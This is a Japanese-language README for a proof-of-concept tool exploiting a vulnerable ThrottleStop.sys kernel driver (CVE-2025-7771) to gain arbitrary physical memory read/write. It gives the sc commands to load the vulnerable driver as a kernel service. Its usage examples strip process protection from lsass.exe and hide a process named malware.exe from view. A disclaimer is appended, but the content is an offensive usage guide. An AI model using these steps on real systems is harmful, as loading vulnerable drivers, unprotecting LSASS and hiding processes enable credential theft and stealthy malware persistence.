
ThrottleStop.sysドライバーの脆弱性を実証するシンプルなPoCであり、任意の物理メモリ読み取り・書き込み機能と、Superfetchを使用した仮想アドレスから物理アドレスへの変換を示しています。
ThrottleStop.sys ドライバーの脆弱性を実証するシンプルな PoC で、任意の物理メモリの読み書き機能と、Superfetch を使用した仮想アドレスから物理アドレスへの変換を示しています。
管理者権限で cmd.exe を起動し、タイプ "kernel"、binPath に脆弱なドライバーのパスを指定して、カーネルドライバーサービスを登録します。
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop
コマンド:
--protect : プロセスを保護します。
--unprotect : 保護されたプロセスの保護を解除します。
--hide : プロセスを非表示にします。
--unhide : 非表示のプロセスを再表示します。
--help : ヘルプを表示します
例:
CVE-2025-7771.exe --protect notepad.exe または CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe または CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe または CVE-2025-7771.exe --hide 12345
非表示のプロセスを再表示するには、'--eprocess' で非表示プロセスの eprocess アドレスを指定して --unhide コマンドを使用できます:
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
このツールを使用する前に、適切な許可を得ていることを確認する責任はあなたにあります。作者は誤用に対するいかなる責任も負いません。
これは進行中のプロジェクトです。貢献や提案を歓迎します!アイデアや改善点がある場合、またはコラボレーションをご希望の場合は、お気軽に以下のアドレスまでご連絡ください: [email protected]